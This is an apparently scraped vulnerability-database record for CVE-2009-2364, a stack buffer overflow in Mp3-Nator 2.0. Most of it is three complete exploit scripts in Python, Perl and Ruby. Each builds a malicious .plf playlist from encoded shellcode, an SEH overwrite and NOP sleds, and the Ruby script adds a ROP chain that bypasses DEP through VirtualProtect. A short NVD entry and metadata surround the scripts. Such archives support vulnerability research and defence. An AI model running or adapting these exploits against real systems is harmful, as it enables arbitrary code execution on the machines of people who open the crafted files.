{"id": "EDB-ID:15489", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mp3-Nator 2.0 - Buffer Overflow Exploit SEH", "description": "Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH). CVE-2009-2364. Local exploit for windows platform", "published": "2010-11-11T00:00:00", "modified": "2010-11-11T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/15489/", "reporter": "C4SS!0 G0M3S", "references": [], "cvelist": ["CVE-2009-2364"], "lastseen": "2016-02-01T21:56:29", "viewCount": 5, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-02-01T21:56:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2364"]}, {"type": "exploitdb", "idList": ["EDB-ID:9060", "EDB-ID:15569"]}], "modified": "2016-02-01T21:56:29", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/15489/", "sourceData": "#!usr/bin/python\r\n#\r\n#Exploit Title: Exploit Buffer Overflow MP3-Nator\r\n#Date: 10\\11\\2010\r\n#Author: C4SS!0 G0M3S\r\n#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip\r\n#Version: 2.0\r\n#Tested on: WIN-XP SP3\r\n#\r\n#\r\n#Writted By C4SS!0 G0M3S\r\n#\r\n#Home: http://wwww.google.com.br\r\n#\r\n#\r\n#E-mail: Louredo_@hotmail.com\r\n#\r\n#\r\nimport os,sys\r\n\r\ndef layout():\r\n os.system(\"cls\")\r\n os.system(\"color 4f\")\r\n print(\"\\n[+]Exploit : Exploit Buffer Overflow MP3-NATOR v2.0\")\r\n print(\"[+]Author : C4SS!0 G0M3S\")\r\n print(\"[+]E-mail : Louredo_@hotmail.com\")\r\n print(\"[+]Home : http://www.invasao.com.br\")\r\n print(\"[+]Impact : Hich\")\r\n print(\"[+]Version : 2.0\\n\")\r\n\r\nif len(sys.argv)!=2:\r\n\r\n layout()\r\n print(\"[-]Usage: Exploit.py <File to Create>\")\r\n print(\"[-]Exemple: Exploit.py musics.plf\\n\")\r\n print(\"[-]Note: The Extension of the File Should be .plf for the Exploit Work\")\r\n \r\nelse:\r\n #Exec The Calc.exe\r\n buffer = (\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"\r\n \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\" \r\n \"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x38\"\r\n \"\\x4f\\x45\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x33\\x4b\\x48\"\r\n \"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\"\r\n \"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\n \"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x58\"\r\n \"\\x4f\\x45\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x50\\x4b\\x44\"\r\n \"\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x38\"\r\n \"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\"\r\n \"\\x42\\x4c\\x46\\x46\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\"\r\n \"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58\\x42\\x37\\x4e\\x51\\x4d\\x4a\"\r\n \"\\x4b\\x48\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x38\\x42\\x58\\x42\\x4b\"\r\n \"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x36\\x4e\\x43\\x4f\\x45\\x41\\x53\"\r\n \"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\"\r\n \"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x38\\x46\\x30\\x4f\\x35\\x4a\\x46\\x4a\\x39\"\r\n \"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x46\"\r\n \"\\x4e\\x46\\x43\\x36\\x42\\x50\\x5a\")\r\n\r\n nseh=\"\\x90\\x90\\xeb\\xf6\"\r\n seh=\"\\x1a\\xab\\x51\\x00\"\r\n nops=\"\\x90\" * 3000\r\n nops2=\"\\x90\" * 760\r\n shell=\"\\xcc\" * 600\r\n jmp=\"\\xe8\\x5b\\xfb\\xff\\xff\" #Jmp From Start The My Shellcode \r\n file=str(sys.argv[1])\r\n \r\n op=\"w\"\r\n try:\r\n f=open(file,op)\r\n f.write(nops+buffer+nops2+jmp+nseh+seh+shell)\r\n f.close()\r\n layout()\r\n print(\"[+]Creating File: \"+file)\r\n print(\"[+]Identifying Shellcode length\")\r\n print(\"[+]The Length of Your Shellcode:\"+str(len(buffer)))\r\n print(\"[+]File \"+file+\" Created Successfully\")\r\n except IOError:\r\n print(\"[+]Error in Create The File\")\r\n", "osvdbidlist": ["55740"]}

{"cve": [{"lastseen": "2020-10-03T11:54:15", "description": "Stack-based buffer overflow in Mp3-Nator 2.0 allows remote attackers to execute arbitrary code via (1) a long string in a .plf file and (2) a long string in the listdata.dat file, possibly related to a track entry.", "edition": 3, "cvss3": {}, "published": "2009-07-08T15:30:00", "title": "CVE-2009-2364", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2364"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:mp3-nator:mp3-nator:2.0"], "id": "CVE-2009-2364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2364", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mp3-nator:mp3-nator:2.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T09:47:03", "description": "MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH). CVE-2009-2364. Local exploit for windows platform", "published": "2009-07-01T00:00:00", "type": "exploitdb", "title": "MP3-Nator 2.0 plf File Universal Buffer Overflow Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2364"], "modified": "2009-07-01T00:00:00", "id": "EDB-ID:9060", "href": "https://www.exploit-db.com/exploits/9060/", "sourceData": "#!/usr/bin/perl\r\n#[+] Bug : Mp3-Nator 2.0 (plf) Universal Buffer Overflow Exploit (SEH)\r\n#[+] Author : ThE g0bL!N\r\n# # Greetz to all my friends\r\n## Download:http://files.brothersoft.com/mp3_audio/players/mp3nator.zip\r\n## Tested on: Windows XP Pro SP2 (Fr)\r\n##########################################################\r\n# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com\r\nmy $shellcode =\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\".\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x38\".\r\n\"\\x4f\\x45\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x33\\x4b\\x48\".\r\n\"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\".\r\n\"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x58\".\r\n\"\\x4f\\x45\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x50\\x4b\\x44\".\r\n\"\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x38\".\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\".\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58\\x42\\x37\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x48\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x38\\x42\\x58\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x36\\x4e\\x43\\x4f\\x45\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\".\r\n\"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x38\\x46\\x30\\x4f\\x35\\x4a\\x46\\x4a\\x39\".\r\n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x46\".\r\n\"\\x4e\\x46\\x43\\x36\\x42\\x50\\x5a\";\r\nmy $pad1=\"D_Z\"; #trick track\r\nmy $junk=\"\\x41\" x (4100-length($shellcode));\r\nmy $jmp=\"\\xE9\\xF7\\xEF\\xFF\\xFF\";\r\nmy $next_seh=\"\\xEB\\xF9\\x41\\x42\";\r\nmy $seh=\"\\x9C\\x29\\x40\\x00\";\r\nopen(myfile,'>>exploit.plf');\r\nprint myfile $pad1.$shellcode.$junk.$jmp.$next_seh.$seh;\r\n\r\n# milw0rm.com [2009-07-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9060/"}, {"lastseen": "2016-02-01T22:05:20", "description": "MP3-Nator Buffer Overflow (SEH - DEP BYPASS). CVE-2009-2364. Local exploit for windows platform", "published": "2010-11-18T00:00:00", "type": "exploitdb", "title": "MP3-Nator Buffer Overflow SEH - DEP BYPASS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2364"], "modified": "2010-11-18T00:00:00", "id": "EDB-ID:15569", "href": "https://www.exploit-db.com/exploits/15569/", "sourceData": "# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)\r\n# Date: 18-11-2010\r\n# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com\r\n# Credit/Bug Found By: C4SS!0 G0M3S\r\n# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip\r\n# Version: 2.0\r\n# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)\r\n# CVE: N/A\r\n \r\n#! /usr/bin/env ruby\r\nfilename = 'crash.plf'\r\n\r\n# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\\x00' -t ruby\r\n# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)\r\nshellcode =\r\n\"\\x89\\xe3\\xda\\xcf\\xd9\\x73\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\" +\r\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" +\r\n\"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" +\r\n\"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" +\r\n\"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x4d\\x38\\x4d\\x59\\x47\\x70\\x43\\x30\" +\r\n\"\\x47\\x70\\x43\\x50\\x4e\\x69\\x48\\x65\\x50\\x31\\x48\\x52\\x43\\x54\" +\r\n\"\\x4c\\x4b\\x51\\x42\\x46\\x50\\x4e\\x6b\\x50\\x52\\x44\\x4c\\x4c\\x4b\" +\r\n\"\\x50\\x52\\x46\\x74\\x4e\\x6b\\x51\\x62\\x45\\x78\\x46\\x6f\\x4c\\x77\" +\r\n\"\\x43\\x7a\\x47\\x56\\x50\\x31\\x49\\x6f\\x45\\x61\\x49\\x50\\x4e\\x4c\" +\r\n\"\\x47\\x4c\\x45\\x31\\x43\\x4c\\x47\\x72\\x44\\x6c\\x51\\x30\\x4f\\x31\" +\r\n\"\\x48\\x4f\\x46\\x6d\\x43\\x31\\x49\\x57\\x4b\\x52\\x4a\\x50\\x46\\x32\" +\r\n\"\\x43\\x67\\x4c\\x4b\\x46\\x32\\x46\\x70\\x4e\\x6b\\x43\\x72\\x47\\x4c\" +\r\n\"\\x47\\x71\\x48\\x50\\x4c\\x4b\\x47\\x30\\x43\\x48\\x4b\\x35\\x4b\\x70\" +\r\n\"\\x50\\x74\\x43\\x7a\\x47\\x71\\x4e\\x30\\x42\\x70\\x4c\\x4b\\x51\\x58\" +\r\n\"\\x42\\x38\\x4c\\x4b\\x42\\x78\\x51\\x30\\x46\\x61\\x48\\x53\\x49\\x73\" +\r\n\"\\x47\\x4c\\x43\\x79\\x4e\\x6b\\x44\\x74\\x4e\\x6b\\x45\\x51\\x49\\x46\" +\r\n\"\\x46\\x51\\x49\\x6f\\x45\\x61\\x4b\\x70\\x4c\\x6c\\x4f\\x31\\x48\\x4f\" +\r\n\"\\x46\\x6d\\x43\\x31\\x4a\\x67\\x47\\x48\\x4d\\x30\\x50\\x75\\x48\\x74\" +\r\n\"\\x47\\x73\\x43\\x4d\\x4a\\x58\\x45\\x6b\\x43\\x4d\\x47\\x54\\x42\\x55\" +\r\n\"\\x4b\\x52\\x50\\x58\\x4c\\x4b\\x50\\x58\\x45\\x74\\x47\\x71\\x4e\\x33\" +\r\n\"\\x51\\x76\\x4e\\x6b\\x44\\x4c\\x42\\x6b\\x4e\\x6b\\x46\\x38\\x45\\x4c\" +\r\n\"\\x45\\x51\\x4e\\x33\\x4e\\x6b\\x44\\x44\\x4c\\x4b\\x46\\x61\\x4a\\x70\" +\r\n\"\\x4f\\x79\\x50\\x44\\x44\\x64\\x44\\x64\\x51\\x4b\\x43\\x6b\\x51\\x71\" +\r\n\"\\x43\\x69\\x50\\x5a\\x42\\x71\\x4b\\x4f\\x4d\\x30\\x46\\x38\\x43\\x6f\" +\r\n\"\\x50\\x5a\\x4c\\x4b\\x47\\x62\\x48\\x6b\\x4f\\x76\\x43\\x6d\\x43\\x5a\" +\r\n\"\\x43\\x31\\x4c\\x4d\\x4e\\x65\\x48\\x39\\x45\\x50\\x47\\x70\\x47\\x70\" +\r\n\"\\x46\\x30\\x42\\x48\\x46\\x51\\x4e\\x6b\\x42\\x4f\\x4e\\x67\\x49\\x6f\" +\r\n\"\\x4e\\x35\\x4d\\x6b\\x4b\\x4e\\x46\\x6e\\x44\\x72\\x4a\\x4a\\x50\\x68\" +\r\n\"\\x4c\\x66\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x48\\x55\\x47\\x4c\" +\r\n\"\\x47\\x76\\x43\\x4c\\x46\\x6a\\x4d\\x50\\x4b\\x4b\\x4d\\x30\\x44\\x35\" +\r\n\"\\x45\\x55\\x4f\\x4b\\x47\\x37\\x47\\x63\\x43\\x42\\x50\\x6f\\x51\\x7a\" +\r\n\"\\x45\\x50\\x42\\x73\\x4b\\x4f\\x49\\x45\\x45\\x33\\x43\\x51\\x50\\x6c\" +\r\n\"\\x51\\x73\\x45\\x50\\x47\\x7a\\x41\\x41\"\r\n\r\njunk1 \t= 'A' * 28\r\n\r\n# ROP1\r\nrop1\t= ''\r\nrop1\t<< [0x71ABDAC3].pack('V')\t# PUSH ESP # POP ESI # RETN \t[Module : WS2_32.dll]\r\nrop1\t<< [0x71ABDC56].pack('V') # MOV EAX,ESI # POP ESI # RETN \t[Module : WS2_32.dll]\r\nrop1\t<< \"DEAD\"\t\t\t\t\t# PADDING\r\nrop1\t<< [0x1001595E].pack('V')\t# ADD ESP,20 # RETN - xaudio.dll\r\n\r\n# VIRTUALPROTECT PARAMETERS\r\nparams\t= ''\r\nparams\t<< [0x7C801AD4].pack('V')\t# VirtualProtect\r\nparams\t<< 'WWWW'\t\t\t\t\t# return address [ PARAM #1 ]\r\nparams\t<< 'XXXX'\t\t\t\t\t# lpAddress [ PARAM #2 ]\r\nparams\t<< 'YYYY'\t\t\t\t\t# Size [ PARAM #3 ]\r\nparams\t<< 'ZZZZ'\t\t\t\t\t# flNewProtect [ PARAM #4 ]\r\nparams\t<< [0x5ADA1005].pack('V')\t# writeable address\r\nparams\t<< 'BEEF' * 2\t\t\t\t# PADDING\r\n\r\n# ROP2 - [ PARAM #1 ]\r\nrop2\t= ''\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< \"BEEF\"\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# ROP2 - [ PARAM #2 ]\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN \t[Module : oleaut32.dll]\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# rop2 - [ PARAM #3 ]\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77E8559E].pack('V')\t# XOR EAX,EAX # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN \t[Module : oleaut32.dll]\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# rop2\t- [ PARAM #4 ]\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77E8559E].pack('V')\t# XOR EAX,EAX # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< [0x77C4EC1D].pack('V')\t# ADD EAX,40 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN \t[Module : oleaut32.dll]\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# POINT ESP TO VIRTUALPROTECT\r\nrop2\t<< [0x7475B960].pack('V')\t# XCHG EAX,ESP # RETN \t[Module : MSCTF.dll]\r\nnops\t= \"\\x90\" * 310\r\n\r\njunk1\t= junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)\r\n\r\nseh\t\t= [0x10019C35].pack('V')\t# ADD ESP,41C # RETN - xaudio.dll\r\njunk2\t= 'C' * (10000 - (junk1 + seh).length)\r\nxploit\t= junk1 + seh + junk2\r\n\r\nFile.open(filename,'w') do |fd|\r\n\tfd.write xploit\r\n\tputs \"file size : #{xploit.length.to_s}\"\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15569/"}]}